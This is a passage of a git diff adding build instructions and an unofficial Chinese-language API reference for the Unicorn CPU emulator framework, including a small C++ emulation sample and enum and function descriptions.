+ - UNICORN_QEMU_FLAGS: specify extra flags for qemu's configure script + +To avoid editing config.mk for these customization, we can pass their values to +make.sh, as follows. + + $ UNICORN_ARCHS="arm aarch64 x86" ./make.sh + +NOTE: on commandline, put these values in front of ./make.sh, not after it. + +For each option, refer to docs/README for more details. + + + +[2] Compile from source on Windows - with MinGW (MSYS2) + +To compile with MinGW, install MSYS2 as instructed in the first section. + +Note: After MSYS2 is installed, you will have 3 shortcuts to open the command prompt: "MSYS2 MSYS", "MSYS2 MinGW-32 bit" and "MSYS2 MinGW 64-bit". Use the MinGW shortcut so that compilation succeeds. + +Then, build Unicorn with the next steps: + +- To compile Windows 32-bit binary with MinGW, run: + + $ ./make.sh cross-win32 + +- To compile Windows 64-bit binary with MinGW, run: + + $ ./make.sh cross-win64 + +Resulted files unicorn.dll, unicorn.lib & samples/sample*.exe can then +be used on Windows machine. + +To run sample_x86.exe on Windows 32-bit, you need the following files: + + unicorn.dll + %MSYS2%\mingw32\bin\libgcc_s_dw2-1.dll + %MSYS2%\mingw32\bin\libwinpthread-1.dll + +To run sample_x86.exe on Windows 64-bit, you need the following files: + + unicorn.dll + %MSYS2%\mingw64\bin\libgcc_s_seh-1.dll + %MSYS2%\mingw64\bin\libwinpthread-1.dll + + + +[3] Compile and install from source on Cygwin + +To build Unicorn on Cygwin, run: + + $ ./make.sh + +After compiling, install Unicorn with: + + $ ./make.sh install + +Resulted files cygunicorn.dll, libunicorn.dll.a and libunicorn.a can be +used on Cygwin but not native Windows. 
NOTE: The core framework installed by "./make.sh install" consists of the
diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE.md b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE.md new file mode 100644 index 0000000..a5ec77f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE.md @@ -0,0 +1,25 @@ +To compile Unicorn on Mac OS X, Linux, BSD, Solaris and all kind of nix OS, +see [COMPILE-NIX.md](COMPILE-NIX.md) + +To compile Unicorn on Windows, see [COMPILE-WINDOWS.md](COMPILE-WINDOWS.md) + +To compile Unicorn with CMake on Windows or *nix, see +[COMPILE-CMAKE.md](COMPILE-CMAKE.md) + +Then learn more on how to code your own tools with our samples. + + - For C sample code, see code in directory samples/sample*.c + - For Python sample code, see code in directory bindings/python/sample*.py + - For samples of other bindings, look into directories bindings/<language>/ + +#Building unicorn - Using vcpkg + +You can download and install unicorn using the [vcpkg](https://github.com/Microsoft/vcpkg) dependency manager: + + git clone https://github.com/Microsoft/vcpkg.git + cd vcpkg + ./bootstrap-vcpkg.sh + ./vcpkg integrate install + ./vcpkg install unicorn + +The unicorn port in vcpkg is kept up to date by Microsoft team members and community contributors. If the version is out of date, please [create an issue or pull request](https://github.com/Microsoft/vcpkg) on the vcpkg repository. 
\ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/ABkexFCfphu3zIg.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/ABkexFCfphu3zIg.png new file mode 100644 index 0000000..a82d8e1 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/ABkexFCfphu3zIg.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/DkztJcigHCdmnRp.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/DkztJcigHCdmnRp.png new file mode 100644 index 0000000..95f43f5 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/DkztJcigHCdmnRp.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/F3rSByYuNTGDtC1.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/F3rSByYuNTGDtC1.png new file mode 100644 index 0000000..4cba273 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/F3rSByYuNTGDtC1.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/I25E9sWcJpGyax7.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/I25E9sWcJpGyax7.png new file mode 100644 index 0000000..f4a5af7 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/I25E9sWcJpGyax7.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/IZhyWrGebA5tT4i.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API 
Documentation/API_Doc_Pic/IZhyWrGebA5tT4i.png new file mode 100644 index 0000000..4fb5a43 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/IZhyWrGebA5tT4i.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/K4HMijIVt6lofvT.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/K4HMijIVt6lofvT.png new file mode 100644 index 0000000..521dbfb Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/K4HMijIVt6lofvT.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/MbZk8KjQFqJOxmd.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/MbZk8KjQFqJOxmd.png new file mode 100644 index 0000000..795ed2c Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/MbZk8KjQFqJOxmd.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/NExsavSgu4yMbBQ.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/NExsavSgu4yMbBQ.png new file mode 100644 index 0000000..3bd2401 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/NExsavSgu4yMbBQ.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/OVaHwelNQ4tcLmo.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/OVaHwelNQ4tcLmo.png new file mode 100644 index 0000000..05bd9d8 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/OVaHwelNQ4tcLmo.png 
differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/YCMNcEVyX8GHoPb.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/YCMNcEVyX8GHoPb.png new file mode 100644 index 0000000..0268295 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/YCMNcEVyX8GHoPb.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/ZtRKvUoaPTlshJ4.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/ZtRKvUoaPTlshJ4.png new file mode 100644 index 0000000..37c505c Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/ZtRKvUoaPTlshJ4.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/aU1lbmxMjXA5g3K.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/aU1lbmxMjXA5g3K.png new file mode 100644 index 0000000..130e7a8 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/aU1lbmxMjXA5g3K.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/bpu4r8hgzUvO7Pm.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/bpu4r8hgzUvO7Pm.png new file mode 100644 index 0000000..a5df3cb Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/bpu4r8hgzUvO7Pm.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/dqKBwAWUL7XvypE.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API 
Documentation/API_Doc_Pic/dqKBwAWUL7XvypE.png new file mode 100644 index 0000000..b053216 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/dqKBwAWUL7XvypE.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/fOnNpSKvjYyc7QB.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/fOnNpSKvjYyc7QB.png new file mode 100644 index 0000000..382c440 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/fOnNpSKvjYyc7QB.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/iyodlNFY7hHEOgS.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/iyodlNFY7hHEOgS.png new file mode 100644 index 0000000..90d7bf9 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/iyodlNFY7hHEOgS.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/juNPWvwGUlraKRh.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/juNPWvwGUlraKRh.png new file mode 100644 index 0000000..83a3baa Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/juNPWvwGUlraKRh.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/kbrF7NdV6LDxnYI.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/kbrF7NdV6LDxnYI.png new file mode 100644 index 0000000..c7e5bd4 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/kbrF7NdV6LDxnYI.png 
differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/l1AhdxgKE2U3tZB.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/l1AhdxgKE2U3tZB.png new file mode 100644 index 0000000..24e592a Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/l1AhdxgKE2U3tZB.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/l4HhgDzcJIVvFNU.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/l4HhgDzcJIVvFNU.png new file mode 100644 index 0000000..475ac91 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/l4HhgDzcJIVvFNU.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/q3JtOQRPl5xTFKp.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/q3JtOQRPl5xTFKp.png new file mode 100644 index 0000000..258d275 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/q3JtOQRPl5xTFKp.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/Micro Unicorn-Engine API Documentation.md b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/Micro Unicorn-Engine API Documentation.md new file mode 100644 index 0000000..fab030a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/Micro Unicorn-Engine API Documentation.md @@ -0,0 +1,2754 @@ +# Micro Unicorn-Engine API Documentation + +**Warning:** ***This is an unofficial API document by [kabeor](https://github.com/kabeor), If there are any mistakes, welcome to ask.*** + +**注意:** 
***这是由kabeor制作的非官方API参考文档,如有错误欢迎提出,觉得不错可以给个star鼓励我*** + +之前对Capstone反汇编引擎的API分析文档已经被[官方](http://www.capstone-engine.org/documentation.html)收录 https://github.com/kabeor/Micro-Capstone-Engine-API-Documentation ,在实现自己想要做出的调试器的路上,又遇到了与Capstone同作者的国外大佬aquynh的另一个著名项目Unicorn,不巧的是,详尽的API文档仍然较少,更多的是大篇幅的代码,因此决定继续分析Unicorn框架,包括数据类型,已开放API及其实现。 + +Unicorn是一个轻量级, 多平台, 多架构的CPU模拟器框架,基于qemu开发,它可以代替CPU模拟代码的执行,常用于恶意代码分析,Fuzz等,该项目被用于Radare2逆向分析框架,GEF(gdb的pwn分析插件),Pwndbg,Angr符号执行框架等多个著名项目。接下来我也将通过阅读源码和代码实际调用来写一个简单的非官方版本的API手册。 + +Blog: kabeor.cn + +## 0x0 开发准备 + +Unicorn官网: http://www.unicorn-engine.org + +### 自行编译lib和dll方法 + +源码: https://github.com/unicorn-engine/unicorn/archive/master.zip + +下载后解压 + +文件结构如下: + +``` +. <- 主要引擎core engine + README + 编译文档COMPILE.TXT 等 +├── arch <- 各语言反编译支持的代码实现 +├── bindings <- 中间件 +│ ├── dotnet <- .Net 中间件 + 测试代码 +│ ├── go <- go 中间件 + 测试代码 +│ ├── haskell <- Haskell 中间件 + 测试代码 +│ ├── java <- Java 中间件 + 测试代码 +│ ├── pascal <- Pascal 中间件 + 测试代码 +│ ├── python <- Python 中间件 + 测试代码 +│ ├── ruby <- Ruby 中间件 + 测试代码 +│ └── vb6 <- VB6 中间件 + 测试代码 +├── docs <- 文档,主要是Unicorn的实现思路 +├── include <- C头文件 +├── msvc <- Microsoft Visual Studio 支持(Windows) +├── qemu <- qemu框架源码 +├── samples <- Unicorn使用示例 +└── tests <- C语言测试用例 +``` + +下面演示Windows10使用Visual Studio2019编译 + +打开msvc文件夹,内部结构如下 + +![image.png](API_Doc_Pic/iyodlNFY7hHEOgS.png) + +VS打开unicorn.sln项目文件,解决方案自动载入这些 + +![image.png](API_Doc_Pic/fOnNpSKvjYyc7QB.png) + +如果都需要的话,直接编译就好了,只需要其中几种,则右键解决方案->属性->配置属性 如下 + +![image.png](API_Doc_Pic/F3rSByYuNTGDtC1.png) + +生成选项中勾选你需要的支持项即可 + +项目编译属性为: +1. 使用多字节字符集 +2. 不使用预编译头 +3. 附加选项 /wd4018 /wd4244 /wd4267 +4. 
预处理器定义中添加 ` _CRT_SECURE_NO_WARNINGS` + +编译后会在当前文件夹Debug目录下生成unicorn.lib静态编译库和unicorn.dll动态库这样就可以开始使用Unicorn进行开发了 + +编译到最后一项可能会报错系统找不到指定的路径,查看makefile发现问题出现在此处 +![image.png](API_Doc_Pic/YCMNcEVyX8GHoPb.png) + +事实上只不过是不能将生成的lib和dll复制到新建的文件夹而已,只需要到生成目录去找即可。 + +官方目前提供的最新已编译版本为1.0.1版本,比较老,建议自己编辑最新版本源码,以获得更多可用API。 +Win32:https://github.com/unicorn-engine/unicorn/releases/download/1.0.1/unicorn-1.0.1-win32.zip +Win64:https://github.com/unicorn-engine/unicorn/releases/download/1.0.1/unicorn-1.0.1-win64.zip + +**注意: 选x32或x64将影响后面开发的位数** + + + +### 引擎调用测试 + +新建一个VS项目,将..\unicorn-master\include\unicorn中的头文件以及编译好的lib和dll文件全部拷贝到新建项目的主目录下 + +![image.png](API_Doc_Pic/I25E9sWcJpGyax7.png) + +在VS解决方案中,头文件添加现有项unicorn.h,资源文件中添加unicorn.lib,重新生成解决方案 + +![image.png](API_Doc_Pic/OVaHwelNQ4tcLmo.png) + +接下来测试我们生成的unicorn框架 + +主文件代码如下 + +```cpp +#include <iostream> +#include "unicorn/unicorn.h" + +// 要模拟的指令 +#define X86_CODE32 "\x41\x4a" // INC ecx; DEC edx + +// 起始地址 +#define ADDRESS 0x1000000 + +int main() +{ + uc_engine* uc; + uc_err err; + int r_ecx = 0x1234; // ECX 寄存器 + int r_edx = 0x7890; // EDX 寄存器 + + printf("Emulate i386 code\n"); + + // X86-32bit 模式初始化模拟 + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + + // 给模拟器申请 2MB 内存 + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // 将要模拟的指令写入内存 + if (uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1)) { + printf("Failed to write emulation code to memory, quit!\n"); + return -1; + } + + // 初始化寄存器 + uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); + + printf(">>> ECX = 0x%x\n", r_ecx); + printf(">>> EDX = 0x%x\n", r_edx); + + // 模拟代码 + err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); + if (err) { + printf("Failed on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } + + // 打印寄存器值 + printf("Emulation done. 
Below is the CPU context\n"); + + uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); + printf(">>> ECX = 0x%x\n", r_ecx); + printf(">>> EDX = 0x%x\n", r_edx); + + uc_close(uc); + + return 0; +} +``` + +运行结果如下 + +![image.png](API_Doc_Pic/bpu4r8hgzUvO7Pm.png) + +ecx+1和edx-1成功模拟。 + +## 0x1 数据类型分析 + +### uc_arch + +架构选择 + +```cpp +typedef enum uc_arch { + UC_ARCH_ARM = 1, // ARM 架构 (包括 Thumb, Thumb-2) + UC_ARCH_ARM64, // ARM-64, 也称 AArch64 + UC_ARCH_MIPS, // Mips 架构 + UC_ARCH_X86, // X86 架构 (包括 x86 & x86-64) + UC_ARCH_PPC, // PowerPC 架构 (暂不支持) + UC_ARCH_SPARC, // Sparc 架构 + UC_ARCH_M68K, // M68K 架构 + UC_ARCH_MAX, +} uc_arch; +``` + + + +### uc_mode + +模式选择 + +```cpp +typedef enum uc_mode { + UC_MODE_LITTLE_ENDIAN = 0, // 小端序模式 (默认) + UC_MODE_BIG_ENDIAN = 1 << 30, // 大端序模式 + + // arm / arm64 + UC_MODE_ARM = 0, // ARM 模式 + UC_MODE_THUMB = 1 << 4, // THUMB 模式 (包括 Thumb-2) + UC_MODE_MCLASS = 1 << 5, // ARM's Cortex-M 系列 (暂不支持) + UC_MODE_V8 = 1 << 6, // ARMv8 A32 encodings for ARM (暂不支持) + + // arm (32bit) cpu 类型 + UC_MODE_ARM926 = 1 << 7, // ARM926 CPU 类型 + UC_MODE_ARM946 = 1 << 8, // ARM946 CPU 类型 + UC_MODE_ARM1176 = 1 << 9, // ARM1176 CPU 类型 + + // mips + UC_MODE_MICRO = 1 << 4, // MicroMips 模式 (暂不支持) + UC_MODE_MIPS3 = 1 << 5, // Mips III ISA (暂不支持) + UC_MODE_MIPS32R6 = 1 << 6, // Mips32r6 ISA (暂不支持) + UC_MODE_MIPS32 = 1 << 2, // Mips32 ISA + UC_MODE_MIPS64 = 1 << 3, // Mips64 ISA + + // x86 / x64 + UC_MODE_16 = 1 << 1, // 16-bit 模式 + UC_MODE_32 = 1 << 2, // 32-bit 模式 + UC_MODE_64 = 1 << 3, // 64-bit 模式 + + // ppc + UC_MODE_PPC32 = 1 << 2, // 32-bit 模式 (暂不支持) + UC_MODE_PPC64 = 1 << 3, // 64-bit 模式 (暂不支持) + UC_MODE_QPX = 1 << 4, // Quad Processing eXtensions 模式 (暂不支持) + + // sparc + UC_MODE_SPARC32 = 1 << 2, // 32-bit 模式 + UC_MODE_SPARC64 = 1 << 3, // 64-bit 模式 + UC_MODE_V9 = 1 << 4, // SparcV9 模式 (暂不支持) + + // m68k +} uc_mode; +``` + + + +### uc_err + +错误类型,是uc_errno()的返回值 + +```cpp +typedef enum uc_err { + UC_ERR_OK = 0, // 无错误 + 
UC_ERR_NOMEM, // 内存不足: uc_open(), uc_emulate() + UC_ERR_ARCH, // 不支持的架构: uc_open() + UC_ERR_HANDLE, // 不可用句柄 + UC_ERR_MODE, // 不可用/不支持架构: uc_open() + UC_ERR_VERSION, // 不支持版本 (中间件) + UC_ERR_READ_UNMAPPED, // 由于在未映射的内存上读取而退出模拟: uc_emu_start() + UC_ERR_WRITE_UNMAPPED, // 由于在未映射的内存上写入而退出模拟: uc_emu_start() + UC_ERR_FETCH_UNMAPPED, // 由于在未映射的内存中获取数据而退出模拟: uc_emu_start() + UC_ERR_HOOK, // 无效的hook类型: uc_hook_add() + UC_ERR_INSN_INVALID, // 由于指令无效而退出模拟: uc_emu_start() + UC_ERR_MAP, // 无效的内存映射: uc_mem_map() + UC_ERR_WRITE_PROT, // 由于UC_MEM_WRITE_PROT冲突而停止模拟: uc_emu_start() + UC_ERR_READ_PROT, // 由于UC_MEM_READ_PROT冲突而停止模拟: uc_emu_start() + UC_ERR_FETCH_PROT, // 由于UC_MEM_FETCH_PROT冲突而停止模拟: uc_emu_start() + UC_ERR_ARG, // 提供给uc_xxx函数的无效参数 + UC_ERR_READ_UNALIGNED, // 未对齐读取 + UC_ERR_WRITE_UNALIGNED, // 未对齐写入 + UC_ERR_FETCH_UNALIGNED, // 未对齐的提取 + UC_ERR_HOOK_EXIST, // 此事件的钩子已经存在 + UC_ERR_RESOURCE, // 资源不足: uc_emu_start() + UC_ERR_EXCEPTION, // 未处理的CPU异常 + UC_ERR_TIMEOUT // 模拟超时 +} uc_err; +``` + + + +### uc_mem_type + +UC_HOOK_MEM_*的所有内存访问类型 + +```cpp +typedef enum uc_mem_type { + UC_MEM_READ = 16, // 内存从..读取 + UC_MEM_WRITE, // 内存写入到.. + UC_MEM_FETCH, // 内存被获取 + UC_MEM_READ_UNMAPPED, // 未映射内存从..读取 + UC_MEM_WRITE_UNMAPPED, // 未映射内存写入到.. 
+ UC_MEM_FETCH_UNMAPPED, // 未映射内存被获取 + UC_MEM_WRITE_PROT, // 内存写保护,但是已映射 + UC_MEM_READ_PROT, // 内存读保护,但是已映射 + UC_MEM_FETCH_PROT, // 内存不可执行,但是已映射 + UC_MEM_READ_AFTER, // 内存从 (成功访问的地址) 读入 +} uc_mem_type; +``` + + + +### uc_hook_type + +uc_hook_add()的所有hook类型参数 + +```cpp +typedef enum uc_hook_type { + // Hook 所有中断/syscall 事件 + UC_HOOK_INTR = 1 << 0, + // Hook 一条特定的指令 - 只支持非常小的指令子集 + UC_HOOK_INSN = 1 << 1, + // Hook 一段代码 + UC_HOOK_CODE = 1 << 2, + // Hook 基本块 + UC_HOOK_BLOCK = 1 << 3, + // 用于在未映射的内存上读取内存的Hook + UC_HOOK_MEM_READ_UNMAPPED = 1 << 4, + // Hook 无效的内存写事件 + UC_HOOK_MEM_WRITE_UNMAPPED = 1 << 5, + // Hook 执行事件的无效内存 + UC_HOOK_MEM_FETCH_UNMAPPED = 1 << 6, + // Hook 读保护的内存 + UC_HOOK_MEM_READ_PROT = 1 << 7, + // Hook 写保护的内存 + UC_HOOK_MEM_WRITE_PROT = 1 << 8, + // Hook 不可执行内存上的内存 + UC_HOOK_MEM_FETCH_PROT = 1 << 9, + // Hook 内存读取事件 + UC_HOOK_MEM_READ = 1 << 10, + // Hook 内存写入事件 + UC_HOOK_MEM_WRITE = 1 << 11, + // Hook 内存获取执行事件 + UC_HOOK_MEM_FETCH = 1 << 12, + // Hook 内存读取事件,只允许能成功访问的地址 + // 成功读取后将触发回调 + UC_HOOK_MEM_READ_AFTER = 1 << 13, + // Hook 无效指令异常 + UC_HOOK_INSN_INVALID = 1 << 14, +} uc_hook_type; +``` + + + +### 宏定义Hook类型 + +```cpp +// Hook 所有未映射内存访问的事件 +#define UC_HOOK_MEM_UNMAPPED (UC_HOOK_MEM_READ_UNMAPPED + UC_HOOK_MEM_WRITE_UNMAPPED + UC_HOOK_MEM_FETCH_UNMAPPED) +// Hook 所有对受保护内存的非法访问事件 +#define UC_HOOK_MEM_PROT (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_FETCH_PROT) +// Hook 所有非法读取存储器的事件 +#define UC_HOOK_MEM_READ_INVALID (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_READ_UNMAPPED) +// Hook 所有非法写入存储器的事件 +#define UC_HOOK_MEM_WRITE_INVALID (UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_WRITE_UNMAPPED) +// Hook 所有非法获取内存的事件 +#define UC_HOOK_MEM_FETCH_INVALID (UC_HOOK_MEM_FETCH_PROT + UC_HOOK_MEM_FETCH_UNMAPPED) +// Hook 所有非法的内存访问事件 +#define UC_HOOK_MEM_INVALID (UC_HOOK_MEM_UNMAPPED + UC_HOOK_MEM_PROT) +// Hook 所有有效内存访问的事件 +// 注意: UC_HOOK_MEM_READ 在 UC_HOOK_MEM_READ_PROT 和 UC_HOOK_MEM_READ_UNMAPPED 之前触发 , +// 因此这个Hook可能会触发一些无效的读取。 +#define UC_HOOK_MEM_VALID 
(UC_HOOK_MEM_READ + UC_HOOK_MEM_WRITE + UC_HOOK_MEM_FETCH) +``` + + + +### uc_mem_region + +由uc_mem_map()和uc_mem_map_ptr()映射内存区域 +使用uc_mem_regions()检索该内存区域的列表 + +```cpp +typedef struct uc_mem_region { + uint64_t begin; // 区域起始地址 (包括) + uint64_t end; // 区域结束地址 (包括) + uint32_t perms; // 区域的内存权限 +} uc_mem_region; +``` + + + +### uc_query_type + +uc_query()的所有查询类型参数 + +```cpp +typedef enum uc_query_type { + // 动态查询当前硬件模式 + UC_QUERY_MODE = 1, + UC_QUERY_PAGE_SIZE, + UC_QUERY_ARCH, +} uc_query_type; +``` + + + +### uc_context + +与uc_context_*()一起使用,管理CPU上下文的不透明存储 + +```cpp +struct uc_context; +typedef struct uc_context uc_context; +``` + + + +### uc_prot + +新映射区域的权限 + +```cpp +typedef enum uc_prot { + UC_PROT_NONE = 0, //无 + UC_PROT_READ = 1, //读取 + UC_PROT_WRITE = 2, //写入 + UC_PROT_EXEC = 4, //可执行 + UC_PROT_ALL = 7, //所有权限 +} uc_prot; +``` + + + +## 0x2 API分析 + +### uc_version + +```cpp +unsigned int uc_version(unsigned int *major, unsigned int *minor); +``` + +用于返回Unicorn API主次版本信息 + +``` +@major: API主版本号 +@minor: API次版本号 +@return 16进制数,计算方式 (major << 8 | minor) + +提示: 该返回值可以和宏UC_MAKE_VERSION比较 +``` + +源码实现 + +```c +unsigned int uc_version(unsigned int *major, unsigned int *minor) +{ + if (major != NULL && minor != NULL) { + *major = UC_API_MAJOR; //宏 + *minor = UC_API_MINOR; //宏 + } + + return (UC_API_MAJOR << 8) + UC_API_MINOR; //(major << 8 | minor) +} +``` + +编译后不可更改,不接受自定义版本 + +使用示例: + +```cpp +#include <iostream> +#include "unicorn/unicorn.h" +using namespace std; + +int main() +{ + unsigned int version; + version = uc_version(NULL,NULL); + cout << hex << version << endl; + return 0; +} +``` + +输出: + +![image.png](API_Doc_Pic/q3JtOQRPl5xTFKp.png) + +得到版本号1.0.0 + + + +### uc_arch_supported + +```c +bool uc_arch_supported(uc_arch arch); +``` + +确定Unicorn是否支持当前架构 + +``` + @arch: 架构类型 (UC_ARCH_*) + @return 如果支持返回True +``` + +源码实现 + +```c +bool uc_arch_supported(uc_arch arch) +{ + switch (arch) { +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: return true; +#endif +#ifdef 
